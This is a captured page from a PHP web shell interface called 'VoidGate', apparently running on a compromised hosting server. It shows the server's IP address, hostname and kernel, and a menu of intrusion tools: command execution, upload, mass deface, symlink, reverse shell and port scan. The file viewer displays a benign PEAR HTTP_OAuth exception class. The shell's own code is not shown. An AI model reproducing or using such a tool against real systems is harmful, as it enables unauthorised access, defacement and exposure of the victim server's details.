ヤミRoot VoidGate
User / IP
:
216.73.216.137
Host / Server
:
146.88.233.70 / dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
itrave
/
php
/
HTTP
/
OAuth
/
Consumer
/
Exception
/
Viewing: InvalidResponse.php
<?php /** * HTTP_OAuth * * PHP version 5.2.0+ * * LICENSE: This source file is subject to the New BSD license that is * available through the world-wide-web at the following URI: * http://www.opensource.org/licenses/bsd-license.php. If you did not receive * a copy of the New BSD License and are unable to obtain it through the web, * please send a note to license@php.net so we can mail you a copy immediately. * * @category HTTP * @package HTTP_OAuth * @author Jeff Hodsdon <jeffhodsdon@gmail.com> * @copyright 2009 Jeff Hodsdon <jeffhodsdon@gmail.com> * @license http://www.opensource.org/licenses/bsd-license.php New BSD License * @link http://pear.php.net/package/HTTP_OAuth * @link http://github.com/jeffhodsdon/HTTP_OAuth */ require_once 'HTTP/OAuth/Exception.php'; require_once 'HTTP/OAuth/Consumer/Response.php'; /** * HTTP_OAuth_Consumer_Exception_InvalidResponse * * Exception for invalid responses from OAuth providers. Supplies methods * to get information about the request * * @category HTTP * @package HTTP_OAuth * @author Jeff Hodsdon <jeffhodsdon@gmail.com> * @copyright 2009 Jeff Hodsdon <jeffhodsdon@gmail.com> * @license http://www.opensource.org/licenses/bsd-license.php New BSD License * @link http://pear.php.net/package/HTTP_OAuth * @link http://github.com/jeffhodsdon/HTTP_OAuth */ class HTTP_OAuth_Consumer_Exception_InvalidResponse extends HTTP_OAuth_Exception { /** * HTTP_OAuth_Consumer_Response instance * * @var HTTP_OAuth_Consumer_Response $resonse Invalid response */ public $response = null; /** * Construct * * @param string $message Exception message * @param HTTP_OAuth_Consumer_Response $response Invalid response * * @return void */ public function __construct($message, HTTP_OAuth_Consumer_Response $response) { parent::__construct($message); $this->response = $response; } /** * Call * * If method exists on self::$response pass to that, otherwise * throw BadMethodCallException * * @param string $method Name of the method * @param array $args Arguments for the method * * @return mixed Result from method * @throws BadMethodCallException When method does not exist on * self::$response */ public function __call($method, $args) { if (method_exists($this->response->getResponse(), $method) || method_exists($this->response, $method) ) { return call_user_func_array(array($this->response, $method), $args); } throw new BadMethodCallException($method); } } ?>
Coded With 💗 by
0x6ick